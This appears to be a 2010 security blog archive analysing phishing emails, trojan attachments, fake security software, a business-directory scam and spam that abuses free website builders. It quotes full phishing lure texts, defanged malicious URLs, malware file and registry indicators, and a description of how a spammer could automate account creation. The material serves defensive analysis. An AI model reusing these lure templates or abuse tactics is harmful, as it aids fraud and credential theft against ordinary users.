Original phishing email for egg bank account owners

March 23, 2010 by mxlab 1 Comment

MX Lab intercepted an original, well that’s our opinion on this, phishing email campaign for egg bank account owners.

The email was sent from the spoofed email address Egg Bank Plc <notice@new.egg.com> with the subject “Account notification”.

As always, phishing is about getting personal and confidential information from a user. Once this information is obtained, the data can be used for hacking into bank accounts and so on.

This campaign has a nice attaractive eye catcher with the text “Something for the weekend” and “Two nights for the price of one”. It could catch your attention when you receive it and I could imagine that someone could follow the included link to find out more.

Unfourtunatly, the text continues with: “To ensure your protection….” and this should be moment to start thinking that this isn’t such a good offer after all.

Filed under Phishing Tagged with , , ,

New Bredolab variant target Facebook users

March 17, 2010 by mxlab 3 Comments

MX Lab intercepts a new Bredolab trojan variant masked as an email from Facebook sent from the spoofed email address The Facebook Team <change@facebook.com>. The subject of the message is “Facebook Password Reset Confirmation! Your Support.” and the body of the email contains the following content:

Dear user of facebook,

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
Your Facebook.

As with the previous virus outbreak that targets Facebook users, this email contains instructions to open the attached document Facebook_password_357.zip. Once extracted the 56 kB big file Facebook_password_357.exe is available.

The trojan will create the following files on an infected system:

%Temp%\1.tmp
%System%\nnfj.tqo

The following Windows registry is created:

* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid

The following Windows registry was modified:

* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
o Shell =

Filed under Viruses Tagged with , , ,

Phishing emails with attached HTML forms instead of embedded URLs

March 13, 2010 by mxlab 1 Comment

MX Lab noticed an increase of phishing emails with an attached HTML form instead of the embedded URLs that directs a user to an online form.

Phishing emails with an embedded URL are subject to certain filters or so called intent analysis techniques. The email can be blocked succesfully when the URL is know as a phishing site.

Phishers will try to avoid these techniques by sending an HTML page as attachment with the email. The provided instructions in the email will make sure that the receiver knows how to handle the phishing attempt. You will get an form to fill in some details once the attached web page is opened in a browser. The data is submitted to an online web site that will handle the request and redirects you further.

Western Union phishing

The phishing email is sent from the spoofed address Western Union customer-support@westernunion.com with the subject “Notice from WesternUnion© : Access to sensitive part of your online account has been suspended(CODE:RX41819S1)”.

The attached file has the name restore.account.html and when opened in a browser you will have a webform that asks for your personal details.

When investigating the HTML code we can see that the CSS, Javascript and images are requested from the official web site of Western Union. The post action of the web form will submit the details to hxxp://elainegohl.biz/restore.php.

PayPal phishing

The message comes from account@ paypall.com – notice the use of a domain with a ‘typo error’ – and this one includes the instructions of opening the attached file to restore access to the account.

The attached file Restore Account.html contains a form that will send the submitted details to hxxp://pisyneluta.com/u.php.

Another PayPal phishing example

Dear PayPal customer,

During our regularly scheduled account maintenance and
verification procedure we have detected a slight error in your
billing information.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)
2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please verify your information. To do this we have attached a
form to this email. Please download the form and follow the
instructions on your screen.
NOTE: The form needs to be opened in a modern browser which has
javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3,
Opera 9)

We are requesting this information to verify and protect your
identity. This is in order to prevent the illegal activity of
PayPal accounts.

Please do not reply to this email.

We apologize for any inconvenience this may have
caused. Sincerely, PayPal Security Team.

PayPal Email ID PP836l Email ID PP836

The HTML included with the PayPal phish rendered incorrectly in when opened in a browser. Also, the document was named “Profile Update – PayPal.mth” – notice the .mht type insted of .htm.

Filed under Phishing Tagged with

Explorer SPAM Detector for Public is malware

March 13, 2010 by mxlab 2 Comments

MX Lab intercepted a few messages with the subject “Systematic Security Software : Explorer SPAM Detector for Public” send from the spoofed address Systematic Inc <soft@systematic.com>.

The email offers a software tool called Explorer Spam Detector from Symantec:

Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or not, if you open a mail if the sender is not original is detected. If you are tired of spammers and you are tired as your accounts will be broken, to lose money on paypal or lose auctions, Download this program and all your data, all your accounts will be safe. This program is free, you do not need to buy it, you do not need a license.

Below is an actual screenshot of the email:

The included URLs wil take you to a web site where the malware is hosted: hxxp://systematic.armed.us/download/Setup.exe.

The malware is approx. 1,5 MB when downloaded and is named Setup.exe.

Submission to Virus Total gives us the result that only 1 of the 40 AV engines did detect the malware: Symantec AV engine version 20091.2.0.41. The name Suspicious.Insight is a detection for files from the Symantec’s reputation-based security technology so this is not the name of the malware.

When executed on a computer, the system gets infected and a new window is created:

With the appearance of this window on your system you could have the indication that the software didn’t installed correctly. By now, your computer is infected.

Folowing files are created:

%AppData%\Microsoft\System\Services\[filename of the sample #1] where %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The file %System%\drivers\etc\hosts is modifed and following folders are created:

* %AppData%\Microsoft\System
* %AppData%\Microsoft\System\Services

A Windows registtry is added so that the malware is run each time the computer boots:

# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
* [filename of the sample #1] = “%AppData%\Microsoft\System\Services\[filename of the sample #1]“

The HOSTS file is updated with the following URL-to-IP mappings:

127.0.0.1 www.virscan.org
127.0.0.1 virscan.org
127.0.0.1 221.207.255.61
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 91.121.223.25
127.0.0.1 www.xxbots.net
127.0.0.1 xxbots.net
127.0.0.1 208.43.26.70
127.0.0.1 www.virusscan.jotti.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 66.36.241.92
127.0.0.1 forums.malwarebytes.org
127.0.0.1 74.63.217.106
127.0.0.1 www.codespace.net
127.0.0.1 codespace.net
127.0.0.1 174.133.4.108

As you can see, with this action you will not longer have access to the web sites that are listed here. Due to the HOSTS file change, all request to visit these sites will point you back to your local computer on 127.0.0.1. This is in order to avoid that the user can visit these sites for information or for downloading anti virus/malware software. If you are infected with this malware, make sure that you modify the HOSTS file.

The possible country of origin for this malware is Russia.

Virus Total permlink and MD5: 97ff431ca077c59d76d147832260b7ef.

Filed under Spam, Viruses Tagged with , , ,

Email with subject “scan upon download” contains trojan

March 9, 2010 by mxlab Leave a Comment

MX Lab started to intercept a few emails with the subject “scan upon download” coming from randomly spoofed email addresses.

The trojan is named Suspicious:W32/Malware!Gemini (F-Secure) or Mal/TibsPk-D (Sophos) and is able to create malicious executable files on the infected system.

The body of the email:

Dear Sirs,
We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment. We are enclosing the file with the prepared contract.

The email has the ZIP archive attached named Contract.zip, a 202 kB large file, and once extracted an executable file named Contract.exe appears.

The following files are created:

%AppData%\av.exe
%AppData%\v7LsGuo3u6bku

A new process is created:

%AppData%\av.exe

Virus Total permlink and MD5: 99b165be9e35f83b811925ccbb9be36d.

Filed under Viruses Tagged with , , ,

Directory scam: Registration of the World Business Directory 2010/2011

March 9, 2010 by mxlab 15 Comments

MX Lab reported in 2009 about the misleading marketing trick that the World Business Directory uses. Guess what, they are back!

MX Lab received a new registration form from the World Business Directory and again, we want to point out a few things before you sign their contract.

The email comes from info@companyworld2010.com, with the subject “Registration of the World Business Directory 2010/2011″ and this is the email content:

Dear Madam/Sir,

In order to have your company registered in the World Business
Directory for 2010/2011, please print, complete and return the
enclosed form (PDF file) to the following address:

World Business Directory
Suite 149 – Rosden House – 372 Old Street
EC1V 9AU / London – United Kingdom
E-mail: office@companyworld2010.com
Fax: +44 207 806 8157

Updating is free of charge!

To unsubscribe, please send an email to
unsubscribe@companyworld2010.com

Attached is a PDF file named world-businessdirectory.pdf.

The 1st point that needs your attention is the text block 1:

To update your company profile, please print, complete and return
this form (Updating is free of charge). Only sign if you want to
place an insertion.

As you can read, updating is free of charge but if you want your company get listed in this directory you will need to sign and have to pay.

What is the price of this directory you may ask yourself? Well, you have to go to text block 2 with the very small letters and this includes:

I WILL HAVE AN INSERTION INTO ITS DATA BASE FOR THREE YEARS. THE PRICE PER YEAR IS GBP 980.

And there you have it, this contract will cost your business a total amount of GBP 2940 over 3 years. After the 3 years subscription you can stop your contract if you inform them on time:

THE SUBSCRIPTION WILL BE AUTOMATICALLY EXTENDED EVERY YEAR FOR ANOTHER YEAR, UNLESS SPECIFIC WRITTEN NOTICE IS RECEIVED BY THE SERVICE PROVIDER OR THE SUBSCRIBER TWO MONTHS BEFORE THE EXPIRATION OF THE SUBSCRIPTION.

A few arguments from our side that this is a scam:

The from email address contains the domain companyworld2010.com and when trying to see if there is a site online we got the notification “This account has been suspended”. We might see new emails from the World Business Directory appear with other domains.

When getting some WHOIS information on the domain we got the following:

Registrant:
 international group c/o Free Private Reg
 P.O. Box 81024
 Burnaby, BC V5H 4K2
 CA

 Domain name: COMPANYWORLD2010.COM

 Administrative Contact:
    boot, cornelis  companyworld2010.com@freeprivateregistration.com
    P.O. Box 81024
    Burnaby, BC V5H 4K2
    CA
    852-3594-1708
 Technical Contact:
    Hostmaster, Domain  hostmaster@doteasy.com
    Suite 210 - 3602 Gilmore Way
    Burnaby, BC V5G 4W9
    CA
    (604) 434-4307    Fax: (604) 608-6832

 Registrar of Record: In2net Network Inc.
 Record last updated on 05-Mar-2010.
 Record expires on 05-Mar-2011.
 Record created on 05-Mar-2010.

 Domain servers in listed order:
    DNS8.DOTEASY.COM   65.61.199.14
    DNS7.DOTEASY.COM   65.61.198.14

 Domain status: clientTransferProhibited
                clientUpdateProhibited

The registrant information is rather vague and points to a PO Box and the administrative contact has the same address. The domain freeprivateregistration.com in the email address of the administrative contact is just a domain alias from doteasy.com. These details must be fake.

In 2009, the PDF document needed to be returned to an address in The Netherlands, in this 2010/2011 edition it needs to be returned to an address in London, UK.

When visiting their site at http://www.world-businessdirectory.com/ on the ‘About us’ page we found the following text:

The World Business Directory online is product of EU Business Services Ltd, a corporation organized and existing under the laws of Nevis, West Indies.

We also  found the UK address on the ‘Contact us’ page.

Our recommendation is: don’t sign the document and don’t do business with this company.

Follow these guidelines if  you are a victim of this directory scam:

  • Do not pay, even if they imply to take your case to court.
  • If you have paid a certain amount, stop the next payments. Expect that you won’t get a refund either.
  • Send them a letter informing them you have been misled and telling them to cancel the contract.
  • If possible, report to (local) authorities.

Additional information:

Stop EU Business Services Ltd Trading As World Business Directory
Stop world-businessdirectory.com

On the web site of Richard Corbett you can find some background information about directory scams and what to do when you are a victim of such a scam.

Filed under Various Tagged with , , ,

Web site creator hosts are being abused in spam campaigns

March 6, 2010 by mxlab Leave a Comment

Spammers are not afraid to abuse community sites or blog creators like blogspot.com in their spam campaigns. In some cases, the content is published on these site or a redirect is embedded and forwards the visitor to the web site of their choice offering porn, pills and other stuff.

MX Lab noticed an increase the last few days of URLs in spam messages that point to (free) web site creater hosts or less well know blog creators. Some of the latest victims are doodlekit.com, sitekreator.com, webs.com, webstarts.com and blogdrive.com.

Some examples of the spam:

of necromancer beyond power drill ostensibly wily
dissidents customer
PornstarMikaTanAnalFingering hxxp://trhombic.blogdrive.com
because girls

dissidents blotched greedily

mirror about starlet likeable
WorldOfLustyAmatteurGalsFujckkingOnCameraWithBigCodfckedLadsAndBelovedSelxToys hxxp://sitekreator.com/Dewtty/sdfgty.html

haunchestoward

for cleavage inside carelessly womanly
bubble baths scythe
AsianSuckingAndFuckingHardcore hxxp://wilfredorz.webs.com
or tea parties

over and accidentally

tea parties flabby
WorldOfLustyAmatenurGalsFujckkingOnCameraWithBigCobckedLadsAndBelovedSjexToys hxxp://s2.webstarts.com/ssey/q2.html

philosopherssecretly

What we also notice is the use of random words in the spam message again. This is a very common technique being used in the past to avoid detected by Bayesian filters and/or to compromise and corrupt the knowledge database of the Bayesian filter when the message is used to train the filter.

This technique is also present in the latest spam campaign of the Canadian Pharmacy:

This is a link to our shop http://bc.greatsilent.ru/

gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy
irewyumuco izaafoe samin uypoi nyqii asydado
hoxyaogeqa eokinap asiwy yziuboaxoj alomem kawuqyxy
ajitikumoa fiaxe oqoce qiahow yvenouwa bosyebuje ucotaley
yeqa uhybyo nidodyziru logu noboma uuju uedywaby
…. (cut)….

New web site creator hosts are being used each day. When I visited a few of those web site creator host I found out that subscription is so easy to do. You can automate account requests quite easily up to a certain point without being blocked by some way of security measure or by clicking on an activation link by email.

On doodlekit.com we found a CAPTCHA security on the subscription web form but I believe that a good CAPTCHA should have letters that are less readable than this one. But, this is a start.

On webs.com I did set up a dummy web site account with the site address http://tryviagra.webs.com without any security measure! This means that anyone can set up an free web site creator account when completing the webforms.

In this particular case, I can even automate every step and let a bot do all the work for you. I could create from 10 to 100 accounts on a day and perhaps the site administrators wouldn’t even notice this. It is a very efficient way of getting coverage on the internet, getting free hosting for my site or redirect visitors to my site.

To make it worse, I can also place malware on this site and try to infect each visitor on my site with malware, ransomware or other malicious files.

As a spammer, I have the advantage over Intent Anyalisis tools or SURBL, tools that examine and block messages based on the included URLs, by generating mutliple URLs each day and changing URLs in the spam message.

Again, it shows that internet security is a responsability of everyone and everyone should get involved. If we want to stop spammers, we also have to make sure that some of the features that spammers have today – this is a nice example I think – can’t be used tomorrow.

Feel free to comment on this post.

Disclaimer: it is not our intention to attack webs.com on their lack of security – perhaps in a certain way it is – but to point out how easy it is to abuse certain online tools.

Filed under Spam Tagged with